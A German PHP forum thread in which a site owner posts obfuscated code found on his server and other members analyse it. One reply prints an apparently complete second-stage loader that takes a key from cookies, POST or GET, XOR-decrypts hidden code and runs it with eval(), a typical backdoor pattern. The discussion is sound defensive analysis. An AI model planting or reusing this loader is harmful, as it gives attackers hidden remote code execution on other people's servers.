✔ Codeerklärung! vermutlich Spam-Script

djnelly · 16. Oktober 2012

Hallo,

ich habe auf meinen Server ein PHP-Script gefunden. Ich vermute es ist ein Spam-Script.

Ich habe das Script gekürzt, damit es niemand verwenden kann.

Kann mir das jemand erläutern****?

PHP:

<?php for($o=0,$e='&\'()*+,-.:]^_`{|,,,|-((.(*,|)`)&(_(*,+)`(-(,+_(-(.(:(](^(_(`({)]+`+{+|,&-^-_(^)](](^(_(^(:(`(,-_(.-_(]({(_+_(-(_+`+_(-)]+_(-(_(,(.(:(`(`)]+_(-,&(:+`+_(--^(.(.(`(_(,-^(:(`(](]+_(-,&+_(-)](^({(:-_+_(--_(:,&(,)](:-^(:-_(,(](.+{+_(-(_(,+`(:(](:(_(:(,(,-_(`+{(]-^(.(`(`-_+_(-(,(,(^(^-^+_(-(`(,+`(:(_(:+|+_(-({(`+{(],&(,(.(,(.(:-_+_(-(^+_(-)](](:(](^(_(:(`)](^-_(_(:(^+`(_+`(`+_(-(](^(_+_(-(^+{(^+{(^(,+_(-(.(:,&(,(:(:(_(](.(_(:(_,&+_(-(_(]-_+_(-)](^,&(,({(:+`(:+|(,)](:({(]+`(.(:(:(,(]+{(:(.(^(:(^(.(,({(:(:(:(`(]+`(:(_+_(-(.(.-_(:(^(_+_(-(.+_(-(^(:+_(-(](,(.(:+|(:+|(](.(`(](,(.(.+{(.(^(:(](:(^(^(`(,+_(-+_(-({(.(_(:+_(-+_(-({(.(_(],&(_(_+_(-(_(,,&(:(,(^({+_(-+_(-+_(--_(:+{(:(_(,(](,+|(,-_(:(.(:-_+_(-({(:+_(-(](^(^+`(]+|(.(.(:({+_(-)](.(,+_(--^(.(.(.(]+_(--^(_(.+_(--_(^+{(^(,(^({(:,&(,-_(:(^(,(:(.(](:(:(](:(_(.(^-^+_(-(:+_(-({(,,&(.+`+_(-(:(.(,+_(--^(.-_(:+{(]+|(_)](`(_+_(-(]+_(--^(:+|(:+`+_(--^(:+`(,(^(.(](,)](,-^(:,&(^-_(,+_(-+_(--_(.+_(-(`+_(-(],&(.(,+_(-(:(:)](.(.(,-^(.({+_(-+_(-(^+{(](.(_)](^(:(,-^(:(_(,+|(.(:(:({(,-^(_,&+_(-+_(-+_(-+`(,+`(.+_(-(,(_+_(-)](:+{(,-_(.(_(:+`(:(](.(,(]-^+_(-(`(,({(`(^(`(^(.+`(:(^+_(--_(.(](:(^+_(--_(.+|(^)]+_(-+|(:(](:(`(.+_(-(,(:(.(,+_(--^(:)](`-^(]+|(:(_(^-^+_(-(`(,(`(:-^(,(_(,-_(.+{(,-_(.)](`+_(-(](.(_+|(,,&(`({(,-_(:(`(:-_(,(:(:,&(,-_(_(.(`+_(-(,(:(.(](](^(.,&+_(-+{(:,&(.)](,-_(:,&(],&(_(_+_(-(_(,,&(:(,(^({+_(-+_(-+_(--_(:+{(:(_(,(](,+|(,-_(:(.(:-_+_(-({(:+_(-(](^(^+`(]+|(.(.(:(_+_(-+`(:(_(,(](_,&(`-_(](.(`-^(:+|+_(-(_(,-^(:(](:(,(,(](:(_(](.(_,&(:-^(,+`(:(_(_)](,(.+_(-)](:,&(:+`(:(^(:+|+_(-+`(.-_(:({(]+|(_)](`(_+_(-(]+_(--^(:+|(:+`+_(--^(:+`(,(^(.(](,)](,-^(:,&(^-_(,+_(-+_(--_(.+_(-(`+_(-(],&(.(:+_(-({(.(^(:(^(:(](.+`(](_+_(-(`(,(^(`(^(`(,(](:(_({(_(,(.-^(:(:(,,&(.+|(^({+_(-(`(](:(`(^(:+_(-(,+{(.(,(:(^(.-_(.-^(,-^(.(_+_(-+_(-(^-^(.+{(:(](.+|(,(](:(,+_(--^(.(:(:)](,(^+_(-+`(^(:(,+`(,(.(.+_(-(.,&+_(-)](`+{(],&(.-_(.-^(,-^(.(_+_(-+_(-(^+{(](.(_)](^(:(,-^(:(_(,+|(.(:(:({(,-^(_,&+_(-+_(-+_(-+_(-(,+`(:+|(,(_(,-_(.+{(,-_(.)](`+_(-(](`(_,&(^-^+_(-(:+_(-({(,,&(.)](,+{(.(,+_(-)](:-^(:-^+_(-)](:(,(]+`(,-^(,(:(:(:(.+`(:(^(.(,+_(-(:(:)](.(.(,-^(.({(]+`(,-^(,(:(:(:(.+`(:(^(.(,(,(.(.-_(:+`(,(`+_(-+`(^(:(,+`(,-^(:+_(-(.(^+_(-(_(:+{(,+{(:)](,)]+_(-+{(.+`(](_+_(-(`(,(^(.-^(.(^(,(.(:(.+_(-)]+_(-(^(.(_+_(-)](.+`(^(^(.,&(,(](.(.(:+|(,(](.-_+_(-(_(.(.(:(`+_(-({+_(-+`(^(:(,+`(,-^(:+_(-(`(,(](:(_({(_(,(.(:(:(,(](:(_(](^(^+_(-(:(,(^(,,&(:+|+_(-(.(:(_(,)](_(:(.,&+_(-(:+_(-+`(^(.+_(-+{(,-^(`+`(`-^(,)](:(.(,(](_+`(:({(,(](:+_(-+_(-(_+_(-(`+_(-(:(:(`(:+`(^(,(`(:(,(](.(^(`(_(,,&(:(,(^({+_(-+_(-+_(--_(:+{(:(_(,(](.(,(]+`(.+{(.(,(,+`(.+|(^+`+_(-(:(,)](:-^(:+|(],&(`+`(^+_(-(:(`(^+|(](](_+`(^(^+_(-+`(,-^(:+_(-(:(.(]+`(:+`(,+|(_+`(.+_(-(,-^(_(^(^(^+_(-(:(,(^(`(.(:+`(,(^(:,&(,+|(.(:(:+_(-(_+_(-(.+_(-(^(:+_(-(](,(.(:+|(:+|(](.(`(](,(.(.+{(.(^(:(](.+|(^({+_(-+{(:(](:(^(:+|+_(--^(`(](](_(,+`(:(,+_(--^(.+{(^(^(,(_(,(.(:,&(:(`(:(^(:(_+_(-(.(.(:(.(^+_(--_(:(_+_(--^(^(^(,(.(:+|(:(,(:(^(:(](,-_(:-^(`+_(-(](.(_+|(,,&(`({(,-_(:(`(:-_(,(:(:,&(,-_(_(.(`+_(-(,(:(.(](](^(.,&(,(.(:+|(:(,(:(^(:(](,-_(:-^(,)](,+`(.)](^+`(^(^(](`+_(-(.(:-_+_(--_(:,&(,)](:-^(:-_(,(](.+{(_)]+_(-(`+_(-(:(:+{(.+`+_(--^(.(,(](.(_,&(:-_(,(^(.+|(_)]+_(-(^(,-^(.(_(,(_(,+{(:-_(,(_(_,&(`-_(](.(`-^(:+|+_(-(_(,-^(:(](:(,(,(](:(_(](.(_,&(:(^(,+`(.+{(_)]+_(-+_(-(,(](:+|(:-_(,(:(:(](],&(_(_(`-^(,(:(.(](](^(.,&(,(.(:+|(:(,(:(^(:(](,-_(:-^(.+`+_(-(`(.,&(^(`(,+_(-(:(](:+{(:(`(,(:(,+|(,,&(.-_(.(.(:(](.(](^+`+_(--^(](.(`+{(_(.(_(,(:+`(,+|(_(.(`(`(,({(.(](^({(.,&(,({(:,&(:(`(,+|(:+`(,,&(_(:(.,&+_(-(:+_(-+`(^(.+_(-+{(,-^(`+`(`-^(,)](:(.(,(](_+`(:({(,(](:+_(-+_(-(_+_(-+_(-(,(](:+|(:-_(,(:(:(](],&(_(:(_,&+_(-(_(]-_+_(-)](^,&(,+|(:(`(.,&(]+`(:(,(,(^(.(](:(,(,(.(.(.+_(-(_(,(](,+`(:-^(.+|(,-_(^)](,+|(:-_(:({(,({(:+_(-(^-_+_(-,&(,(^(`(.(.+_(-(:(^(:+`(,(](.(:(,)](,+|(.(,(](.(^+`(]-_(:+|(`(,+_(-+_(-(:+`(,+|(_(.(:-^(,+`(:(_(_)]+_(-+{(,(^(:+{(,(_(,,&(:(_+_(--^(_(:(.,&+_(-)](.(,(](.(,(`+_(-)](:+|(`+_(-(.+`(:+`(,(](.(:(,)](,+|(.(,(](.(^+`(]-_(:+|(`(,(](:(_({+_(-(`(.-_(:+`+_(-({(.(,(^-_+_(-(](](:(:+`(:({+_(-)](,+|(,(:(.(](:-_(:(](.(.(^(:(,(_(:(](:(:(:(^(,(_(`+`+_(-+_(-(_-^(:-^(^(_(,(^(^-_+_(-+|(,(.(,,&(:-^(,-_(.(`(:(^(.+{(:+`(,(`(_,&+_(--_(])]+_(-)](:(`(.,&+_(--_(.+_(-(,(](_(.(`(.(,(:+_(--^+_(-(.+_(-+|(:(_(,)](`-^(,(_(:+|(,)](.+{(:+`(:(](:(:(^(`+_(--^+_(--^(:(.(,-^(_,&+_(-+_(-(^(.(]+|(`-^(`,&(,)](`+`(^+_(-(](,(^-_(_(.(:,&(_)](,+_(-+_(--^(.(.(:+|+_(-({(:(^(,-_(:-^(:(^(,(:(_,&+_(-(.+_(-(:(:(,(_(:(,(](](_(`(`(,+{+_(-+_(-(_(](:(_(_)]+_(-(.+_(-(:(:(,(_+_(-(,(](](_(`(`(,+{+_(-+_(-(_(.(:(_(_+|(,,&(`({(_(.(.-_(^(:(_(:(:(_(,(_(:)](:(:(,(.(.(:+_(--^+_(-+`(,+`(.+_(-(,(_+_(-+`(:(.+_(-)](:)](.(.(,(:(:(`(](:(^+{+_(-(,(.+`(,(_+_(-+`(:(.+_(-)](:)](.(.(,(:(:(`(](:(^+`(]-_(:+_(-(`(,(^+_(-(.-^(_(,(](:(:(:(,(`(:(_(^(:+_(-+{(,,&(`+`(:+_(-(,+{(.(,(:(^(:)](.-_+_(-({(:+_(-(^(:+_(--_(](.(.)](.+_(-(:(^(.(,+_(-(:(:)](.(.(,-^(.({+_(--^(^(_(,({(`+{(_(.+_(-(`(^)](_(:(.-_(:+`+_(-({(.(,(^-_+_(-(](](:(:+`(:({+_(-)](,+|+_(-)](.(.(:(:(,(`(.)](_)]+_(-(`+_(-(:(:(`(:+`(](:(.({+_(-(.+_(-(^(.(^(,(:(.(,(^+`+_(--^(:(](:(`(.+_(-(,-_(:(,(](.(_-^(:(^(](.(`-^(]+{(`({(_(.(:(`(:(^+_(-)](:(_(,(:(.+|(`-^(,(:(.(](](^(.,&+_(-+{(:,&(.)](,-_(:,&(](:(:+_(-(.-^(:(](:(^(^)](,(.(,-^(:+|(`+_(-(]-^(:(,(](:(`+_(-(.+{(_+_(-(]+|(^(:+_(--^+_(-({(:(`(:(,(,+|(`+{(,(.(.+{(.(^(:(](:(^(](]+_(-,&(,({(,,&(:(_+_(-+`(:(_(,(](_(:(.,&+_(-(:+_(-+`(](_(,(,(,(](:+_(-(,(_(,(^(.(:(,-_(.(](`-^(]-_(.(_+_(--_(])]+_(-(_(^({(^(,(,-_(:-_+_(-)](.-_(:-_(,,&(_,&(^-^+_(-(:+_(-({(,,&(:+|+_(-(.(:(_(,)](_(:(.,&+_(-(:+_(-+`(^(:(,+`(,-^(:+_(-(`+_(-(]-^(:(,(](:(`+_(-(.+{(_+_(-(:({(:+|(^,&(](](:(^(:(_(_(,(`(`(,(](`(`(`+_(-(:({(.-_(`+|(.(](,(,+_(-(`(_-_+_(-({(:({(:({+_(-(:(:+|(]+|(`-^(:+|(^(_(,({(_-_(`,&(:(^+_(-(,(.(^(,(^+_(-,&(.(.(,(,(_,&(^(_(,(^(,-_(_(.(_(,(:+`(,+|(_(.+_(-(_(,-^(.({(](_(,(_+_(-(.(`+`(`,&(,)](`+`(](:(:+_(-(`(.(,({(`({+_(-(.(.,&(:+{+_(-,&(,+`(:-^(,({(]-^(.(](,+{(^(,(:({(:+|+_(-+{(.(*,^(:)^(*-(,_)`(*,+,_(+(*,^,_)^(*,,,_)`(*,+,_(`(*-(,_)^,,,|-((.(*,|)`)&)^(*,|)_(*,,,_)^(*,|(^)`(*,^,_(:-^(*-&)`*&-)-+,(-)-*-((.(*,+(_(*,|(_(*,^,_(:)^(*,*({)`(((*,^((+{(((*-&(()^-`,:,,(.(*-(,_(:-^(*-&)`*&-)-+,(-)-*-((.(*,+(_(*,,,_(_(*-(,_(:)^(*,^)`*&-)-+,(-)-*-((.(*,^(_)&(_(*-(,_(:)^(*,*({)`(((*,^((+{(((*-&(()^-`-(,+-*-+-(,{(.(*,*(:)^-`(-(:)^-`(*,*)`*&,*,+,)-(-:-&-*(.(*,*(_(*,^(:)^,+-,,\',_(.(*,*(:)^',$d='';@ord($e[$o]);$o++){if($o<16){$h[$e[$o]]=$o;}else{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d); ?>

alxy · 16. Oktober 2012

So macht das vermutlich garnix, außer nem parse/syntax error.
Gib doch mal das ganze teil her. (Die, die es verwenden könnten, könnten es auch programmieren, brauchst dir da wahrscheinlich keine gedaken zu machen).

Häufig werden bei "böser Absicht" deine Skripte mit irgendwelchem wirrem zeugs überschrieben, dass dann mittels ezB base64_decode() wieder in was lesbares verwandelt wird und mit eval() dann ausgeführt wird.

Yaslaw · 16. Oktober 2012

ein eval am Schluss - wahrscheinlich ein Bad-Script.

alxy · 16. Oktober 2012

Ups, man konnte die box scrollen :O

Hatte nur die ersten zwei zeilen gesehen.

sheel · 16. Oktober 2012

@Fragesteller: Einfach $d per echo ausgeben, statt dem eval.
Dann siehst du den tatsächlichen Code.

@alxy: Das ist eine Sicherheitsmaßnahme vom Forum gegen Scriptkiddies ;-]

ComFreek · 16. Oktober 2012

Nach dem ersten Durchlauf per [phpf]echo[/phpf] bekomme ich einen Syntax-Error hier:

Code:

Parse error: syntax error, unexpected ')', expecting ';' in test.php on line 3

rd4eva · 16. Oktober 2012

Weil er den code gekürzt hat.
Da er nicht der einzige mit dem "Problem" ist hab ich einfach einen ungekürzten code ergoogelt.
Der zweite Durchlauf bringt folgendes :

PHP:

for($o=0,$e='&\'()*+,-.:]^_`{|+:*+,+)-&|(|*)&\'\'|-((]\')(&\'{(|)^*^))+-&&&()))^&,),\':*&)|&`,`\'-)(&((\'(]&|(-*(,{&:).&&,*(*({&&-&*)(.*{\'+\'+(*&]-`)^({,|-|*{\'^){\'{&,)*&,-:)`(&\'^\'_)+&+(^\'.&++&,\',:(((*&\'&`+--+*{&(&()|\'+,:(((*&\'&`)+&+(^\'.&++&,\',:)+({&,,**_--((\'{&()^\']-\')-)|&`&|(^&\'):-\'(^,\',]\':\',&()--:\'`)]\'{((-,&{)-**\'`\':+.)|\'|)`&:){)|&*(^\',&])*),)&&|-^*{(--|\'&&++{\'-&]),)_\'.-^*`&(&()|\'+\':*)*+,)-:+|,)+],]-\'*+,\'+^+^+&\'()`&)),*(,),`\',*|\':+`&.)])_&:).*]())&*^)(+)+(&.)))-*]),\'((|)+,\'(\'+)\'*&()_)_*(-*&((^(+)*)++-&\'\'.(,)\'\'.(,*`,,\',&`)&+.\'\'\'|)^),&*&_&|)()|\'.)\'*++]*_(().\':(&\'{(((*\'{,(\'|+^+&+.)`&|)+&)(*))*),(+{\')\'.&`(]\')(&\'{(|)^*_,:-,\'*\'{)_)]\'{)]&+(*&:&{)`+|&\'\'|(\'-\'*`(&\')):((&{(.\'\'+^*(,:+)&{),&_()).&{,`\'\'\']&](\'&,\':)^&|(,)])*(&*{\'-&.-+-+(])+\'|(*)+\'|(_+:\'_)*)-(\'&)(&\'{):-{*_),+{\'-&-){&,&|(^&|(:-\'*(,_&`-.&|)-)|&))`&|,(-\'&)(**+(`\'^)`(:&|)`*`,,\',&`)&+.\'\'\'|)^),&*&_&|)()|\'.)\'*++]*_((),\']),&*,`-|*(-{)_\',&{)*)&&*),*(,`){&]),,:&(\':)`)])+)_\'](|).*_,:-,\'*\'{)_)]\'{)]&+(*&:&{)`+|&\'\'|(\'-\'*`()\'.(+)+)*(]*,\'-&+-+-&*),.,&({))&`(_+.\'-*)-+)\'&^(&)+(|({&{(,\'\'+{(^)*(_&*)&\'{()):&+\']+)&]&((\'(`\':-^*`(|({&{(,\'\'+^*(,:+)&{),&_()).&{,`\'\'\'\'&])_&,&|(^&|(:-\'*-,`+{\')\'.&`(:&^(&\':){){\':)&*]&{&)))(])+(&\')):((&{(.*]&{&)))(])+(&&((|)]&-\']+)&]&{)\'(+\',)^&^):&:\'^(]*,\'-&+({(+&()(\':\'+(,\':(]++(`&*(()_&*(|\',(()-\'.\']+)&]&{)\'-&*),.,&())&*),*++\')&+&`)_\'(),&:,)(`\')\']+(\'^&{-]-{&:)(&*,]).&*)\'\',\'-\'))-)]+&-)&*(+-,&`)&+.\'\'\'|)^),&*(&*](^(&&](_+]\')&:){)_*`-]+\')-+_**,]++\']&{)\')(*])]&_,](\'&{,+++\')&+-()]&+)`&_())\',\'(\'+)\'*&()_)_*(-*&((^(+)*(_+.\'^)*)+)_\'{-**,&])&\'{(^++&,&()`)-)+),\'(()(+\'|),\'{++&()_)&)+)*&|){-\'*(,_&`-.&|)-)|&))`&|,(-\'&)(**+(`&()_)&)+)*&|){&:&](:+]++*-\'()|\'|)`&:){)|&*(^,:\'-\'))^(]\'{(&*(,`)|&+(_,:\'+&{(,&,&^)|&,,`-|*(-{)_\',&{)*)&&*),*(,`)+&](^,:\'\'&*)_)|&))**`,,-{&)(**+(`&()_)&)+)*&|){(]\'-(`+-&\')*)^)-&)&_&`(|(()*(*+]\'{*(-^,(,&)]&_,(--&.(*+.(`&.)`)-&_)]&`,)(`\')\']+(\'^&{-]-{&:)(&*,]).&*)\'\',\'\'&*)_)|&))**`,),`\',*|\':+`&_)-(`*])&&+(*)&&(((\',&*&]){(_&|+:&_)|).&.)\'+|\'`&+-((\')+)]&*()&:&_(&*(+]*|)_-&\'\')]&_,(){&]),,:\'^&+)^&,&`),\'{,)(`\':(&*(&-\':)_-\'(])]&*()&:&_(&*(+]*|)_-&*),.\'-(|)]\'.(&+|\'**))]).\':&_&)(*)|)*((+)&,)*)))+&,-]\'\',{){+,&++|\'_&(&`){&|(-)+(^)]&-,`\'|*:\':)-(`\'|(\'&*,(-(&)\'{\'(\'_),&:-{&,)_&:(^)])*))+-\'{\'{)--{)--]+\')-(^,\',]\':+(&.)])_&:).*]):)-&`(&\',\'|&*),)_,&)]&_,(({)*(_+.\'^)*)+)_\'{-^*`):)-&`(&,:\'|&*),)_*`-]*))\'({)*(\'+|\'-*)-+)]&^)`*](*):\'|,++)&]&{)\',)*](&&^(_))*^(.+:\',&{-().&:(-&))_))*_,_&`&|,\'-`-,\':){&^).((*^(&*{\'-&.-()\'&|)|\'](|(*\'.*|+&&-&+)\'(`&))_&*,]({)*)++-&\'\'.(,)\'\'.(,*(,{)+*(){-,&(&](\'(]\'{)^\'.)|-{*|(,\'|*:\',+.)|\'|)`&:){)|&*(^\',&])*(\'(&\':(-&|(--{*|(,\'|&:(^(\'(&\':(-&|(--{*|(,\'|*:\',+.)|\'|)`&:){)|&*(^\',&])*(\')\'&|)|&,\'+))\')(&+++]*|)\'-&\'\'),&:(():*^&+*+\']&{){)+)+),\'((|)+*),\'+++^+&(|+)&_(,&*(:((&((]+.+(\')&`(:&+()&|(*-{*|(,\'|&:*|)`,(&))+*(,(-(&`-.-,&(&*(()_&*-^*{(:-]*_)-\'\'+^*(-^((\'`)^&)(,))*),*-,\'*&{)`)|*(--&_,)-|\'&,\'+:+_+,\'()|&`),\'{):-{*|()\'|*:\',\'((:&:)|&+):))*),\'+&+^+&(|)_&:)^&+,]-(&*-{*^-.&`(-)-&:(-&)(+).*^)`,:&(\':)`)])+)_\'](|).*),\'+++^\'&-,),+\')]&_,(\',&(),,:&&&{(\'),\'|(\'&:(|-{*|)+&^)(\'^(&),&:&_&+)]))&+,`\'(\'\'*-))(^\'.)(\'),(,,+,-^+-&&\':))(&*(-*\']()(,&{,(\']++\':-+-&*,,(+--*)-\':)-+-&^*)-+(:&)()&|,`-]*_)(\'\'+^*-,&,*+*)(\'.).)-\'(,`\'\'&(&((()_*`-|*`)`-\'*(,_\']+,&`-^-&*)(.(](_)+&-(]*+\'-*)-,)|)\',))-,),`\'_(`+|\'{&{-]-.(])+&|(+)&*),\'+&(:+]&|-&*)(.*{(+-.+,&++&\'+&{(,(]*(--&_\'\',-),,_&`&|(^)*)]&,)_\':(|-{*|(),`*)),-^,((]()\'.(+)+)*(,+]\'`\'.)--\'*{()*)-\'(^&{(,+{\'`*^-,),+\'({,&(_()&+(,*(\'^&*)_-:\'(&_&|)())&.,`\'(\'\'*((:-`&+,.(](|({&{(,\'{+,&.-{-`&+-]+\'(|)+&)(]\',)(&()|(:&,)_&{(|-{*:\':+.+&*--,),*),.\'-*&-:**(\'+:+(\'.)|).\'.(-*](_))\'|(,+{-.&`(-)-&:(-&)(+).*^)`,:&\'\'{(()_\'.)+&|){)+&),`\'(\')*--,(:*,--\'.,,-(&-,_)_&:,\'+^)&&_-^*{):,^(^()*+\'`&.):),\']),&*,(-(&],:\'(&(*(-^+),)(.,&*)+|&(()\'{+,&`,|\':&_)_\'](|).*),\'+]+{*:(+)^*.-]*)*&+|,(){)_-^,(+^\':&_(*\'.()((&{,`\'(&\'*--&\'{(|&-*],.-.*|)-\'.+&*^\']&`){&)*+-^-.+^\':**({&+&{(^),)`*.,),`,\'*_)|-^\'_)])&&,),*(,^\',&`(&+:\'**)-,(]*)-],&*)+|,(){)_-^,(+^+&*{)\'+-&])&\':(&+-\',*)-,(]*,,^+^-),**(-{)_-^,(+^+&(])+\'`).)|\'|(&\'{+,&`-{-`&.-]+\'*&+|,(*_*^-.,(+^+&(])+&:(,):\'.(&\'{+,&`-^,(,&+],)*)))&.(`+:+(*:\'`\'(),)`*.-\'+_,(*_*^-.,(+^\':&_)&&,(+(+&{,`\'(&\'*(,:+),)({,&)-+_**,]+(\'`*^(\')*&^(\'\'{,]))\')(&++-.&`(-)-&:(-&)(+).*^)`,:&\'&,))(^\'{&_&|)())&.,`\'(\'\'*(+.((,&+]&)(_-{*|(,&^*|+,-&({&()]&:((-,\'.)&*,\'-\':)*)_\'{)&&(,],-++,+\':\',&{(*-,&*(,&,(,-,+:-^\',+`&|)-(|*+)`\'|(,)]*^,)\'&+(&{)\')\'&+-)(+&\'-**(*|)|&:,\'+^+&&|)&&((+-,*:&]-`({&+-&,(,&+]\'-*&+|&{(:*+\'-&()*-\'(](&\'{).(+\'|)-\'{+,&.-{-^\':(,\'](|(*&`(&*(\'\'&)-&-&*)+:,))\'+_,(*_\'(\')+,\'()_\'(()&,(+)(&{,`\'\'+(*_-{-`&:-]+\'*&+|,()`,:&\'\'{(()_\'.)+&|){)+&),`\'(\'))&,)&**,--&^\'\',*),,:\'(\'))&,\'&**,--&^\'\',(),,_&`-.,((|+),)),&,):))&(()\'{\']&](\'&,\'])(\':):((&))-*)+^\'&(]&,\'])(\':):((&))-*)+]*|)\'-&+\'({,&*)))&-),+)\'^&`-])\'&^(&)+):(|\'.)\'+)\'|*((:(\')+(&\')):((&{(.\'{+,&.-^,(\'-+:,)(|)]\'.(&+|\'**))]).\':&_\':(())&-(:,:\'-\'))-)]*)(.\'(\'+(+&)(&+]\'{)*)-(\'&|)&*(,{)+*(-{*^-.,()-)+\':),&)(_-{&)(**+(`\'^)`(:&|)`*))\'({)*)++:&(&{)_-\'*{)&*)-\'(^,\'*_+)\'{\'.)-)&&_-^&((^(+)*)+**\'`&.&`),\']),&*,)(`\')\']*,&&&*)\'&,&+()&|(*-{*|(,\'|*:\',+.+&&|)|\':(|)|&`,`+{\')\'.&`)_\'(),&:,)(`\')\']+)&]&{)\'-\'*{)&*)-\'(^,\').)_+`**)+),,&--&*---\').(|-_(*&&\'-,|\'.).).\'))_*_-{)_+,&.,|-`)+\'&(+&+\'`((&&,`+,&+&|,(,&)]&_,(\',&{(.*,&,\'(-]-`&:-]*))\'-(&.-.\'((`)^\'`&]){&.*{(*&^+&).)_\'^&`-]\':&|){\']){(|*),\'+++^*((:-`&:,{*{\'+\'\'({\'\',`+,&+&|,(\'-+:&)(_-{(^((+)&,)*)|).&`)]&:\'+(-\'{(]*(\'-\'.&`){\'])&*(,)-|\'&,\'++*|\'.(,(^&)()\':(,)-\'.(`+)&\'*)-,)]*),.\'-*&({)*),+^\')\':(,&,&|(^&|(:-{*|(,\'|*:,\'',$d='';@ord($e[$o]);$o++){if($o<16){$h[$e[$o]]=$o;}else{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}if(!@isset($_SERVER)){$_COOKIE=&$HTTP_COOKIE_VARS;$_POST=&$HTTP_POST_VARS;$_GET=&$HTTP_GET_VARS;}$k=$_COOKIE['key'];if(empty($k)){$k=$_POST['key'];}if(empty($k)){$k=$_GET['key'];}if(!@function_exists('decrypt')){eval('function decrypt($e,$k){if(!$k){return;}$el=@strlen($e);$kl=@strlen($k);$rl=$el%$kl;$fl=$el-$rl;for($o=0;$o<$fl;$o+=$kl){$p=@substr($e,$o,$kl);$d.="$k"^"$p";}if($rl){$p=@substr($e,$fl,$rl);$k=@substr($k,0,$rl);$d.="$k"^"$p";}return($d);}');}$d=@decrypt($d,$k);eval($d);

Man müsste also mindestens noch einen Durchlauf machen.
Dazu müsste man allerdings $key kennen.

Googeln nach Code Fragmenten lässt jedenfalls nicht viel gutes ahnen.:
http://riaschissl.blogspot.de/2012/02/you-have-been-hacked-zendionindexphp.html

ComFreek · 16. Oktober 2012

Sieht mir ganz nach einer XOR-Verschlüsselung aus.

djnelly · 16. Oktober 2012

He Leute...
vielen Dank für die Antworten. Also doch definitiv nichts gutes das Script! Kann mir bitte nochmal einer kurz erläutern, was es genau macht. Hab nur irgendwas mit Cookies verstanden.

ComFreek · 16. Oktober 2012

Am Ende des zweiten Durchlaufes (also der Code von rd4eva) wird ein Schlüssel von $_POST['key'] eingelesen und damit nochmals Code entschlüsselt und wiederum ausgeführt ([phpf]eval[/phpf]).

Allerdings kommt man ohne diesen Schlüssel nicht an Code. Zumindest nicht ohne etwas aufwendigere Analysen.

Also bleibt der Zweck des Codes ungelöst, wohl aber nicht der Sinn: Schaden anrichten.

✔ Codeerklärung! vermutlich Spam-Script

djnelly

Erfahrenes Mitglied

alxy

Erfahrenes Mitglied

Yaslaw

alter Rempler

alxy

Erfahrenes Mitglied

sheel

I love Asm

ComFreek

Mod | @comfreek

rd4eva

Erfahrenes Mitglied

ComFreek

Mod | @comfreek

djnelly

Erfahrenes Mitglied

ComFreek

Mod | @comfreek

Neue Beiträge